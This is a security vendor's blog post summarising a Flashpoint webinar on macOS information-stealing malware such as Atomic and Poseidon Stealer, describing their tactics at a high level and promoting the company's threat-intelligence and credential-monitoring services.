The Rising Threat of macOS Infostealers: What You Need to Know to Defend Against Them

Information-stealing malware has become one of the most pervasive and impactful threats facing organizations today, acting as a primary vector for ransomware and data breaches. While today’s sophisticated Windows-targeting stealers are the result of years of development, the macOS infostealer market is demonstrating its own rapid ascent into popularity.

In a recent Flashpoint webinar, Vice President of Intelligence, Keisha Hoyt, and Senior Hunt Analyst, Paul Daubman unpacked this rising threat. In this session, they provided critical insights into their growing market share, noting prolific and new strains in addition to exploring the common tactics, techniques, and procedures (TTPs) observed in the wild.

Here’s what you need to know.

macOS Infostealers: A Growing and Underestimated Threat

macOS environments are no longer flying under the radar—infostealers are increasingly targeting them with precision and purpose. These malicious tools are designed to harvest valuable information from infected devices, including host data, installed applications, and most critically, browser-stored data such as saved credentials, cookies, and autofill information. This stolen data often serves as the initial access point for threat actors, enabling further compromise or resale to initial access brokers and ransomware groups. 

During the webinar, Flashpoint experts highlighted several prominent and fast-evolving macOS infostealers currently active in the wild:

• Atomic Stealer: Recognized as one of the most prevalent and dominant macOS infostealers, frequently updated and sold as Malware-as-a-Service (MaaS).
• Poseidon Stealer: A sophisticated strain that has remained active even after its source code was sold, with strong ties to Atomic Stealer’s development, as its alleged author is an ex-developer of Atomic.
• Cthulu: Another significant MaaS offering in the macOS infostealer market, often seen alongside Atomic and Poseidon.
• Banshee: A separate project also contributing to the macOS infostealer landscape.

These stealers commonly leverage AppleScript for deceptive prompts, use system profiler commands for data gathering, compress collected data, and exfiltrate it over HTTP. While they remain less mature than their cWindows counterparts, their technical evolution is accelerating. The takeaway is clear: the macOS infostealer ecosystem is evolving quickly, and its growing prevalence signals an inevitable rise in sophistication. Organizations can no longer afford to treat macOS as a lower-tier security priority.

Advanced Reverse Engineering and Automation Are Essential to Proactive Defense

Effective defending against infostealers requires more than detection- it demands deep understanding. Reverse engineering enables analysts to deconstruct compiled malware into “pseudocode,” providing critical insights into how these tools operate, how they evade defenses, and how they evolve. By dissecting infostealer samples, security teams can uncover their inner workings and develop custom detections and automated extractors for key Indicators of Compromise (IOCs). These include command-and-control (C2) servers, universally unique identifiers (UUIDs), usernames, and build IDs—all vital for mapping attacker infrastructure and activity. This process not only uncovers how the malware operates, but also enables the creation of custom detections and automated extractors for critical Indicators of Compromise (IOCs).

Flashpoint’s ability to reliably extract IOCs like C2 servers, universally unique identifiers (UUIDs), users, and build IDs from hundreds of stealer samples demonstrates the power of this automated approach in providing actionable threat intelligence. In the webinar, our intelligence team showcased this by detailing the analysis of Poseidon’s various forms, from simple hex-encoded and Base32-encoded variants to more complex versions employing custom Base64 alphabets and obfuscation techniques. Check out the on-demand video to see it in action.

Flashpoint’s Log Parsing and Enrichment: Turning Raw Data into Real-Time Defense

To effectively defend against infostealers, organizations need more than alerts, they need comprehensive, timely and actionable intelligence. Flashpoint’s unique log parsing and enrichment capabilities provide precisely this. 

Flashpoint processes logs from over 30 active infostealer families, observing around 1.5 million unique infected hosts and capturing an average of 300 million total credential sets monthly, with approximately 50 million being unique credentials and 6 million never-before-seen.

This vast dataset forms the basis for identifying potential initial footholds into organizations. Flashpoint’s rigorous process of collecting, parsing, and distinguishing these logs—despite challenges like varying formats, rebrandings by resellers, and technical inconsistencies—is fundamental. This meticulous log parsing and enrichment transforms raw data into precise, actionable intelligence.

To maximize the impact of this intelligence, Flashpoint recommends a two-pronged approach for security teams: 

• Pair enriched credential datasets with targeted domain monitoring to identify relevant exposures across criminal marketplaces.

• Proactively alert on compromised domains to detect and mitigate infostealer-driven risks before they escalate into breaches.

This method gives defenders a powerful edge, helping them detect initial access vectors early and respond with precision—before stolen data turns into lasting damage.

Mitigate Infostealer Risk with Flashpoint

Flashpoint empowers security teams with the intelligence and visibility required to proactively defend against infostealer threats before they evolve into full-scale incidents. By combining deep technical analysis with industry leading primary source collections and intelligence, Flashpoint enables organizations to:

• Understand which stealers are prolific and how they work
• Learn common infection chains to help identify exposures in real-time
• Prioritize remediation based on threat context and risk
• Disrupt adversary activity before it impacts operations

Throughout every stage of an infostealer attack, Flashpoint intelligence helps you stay ahead of attackers. To deepen your understanding of infostealers and the development of the macOS stealer landscape, watch the full on-demand webinar recording.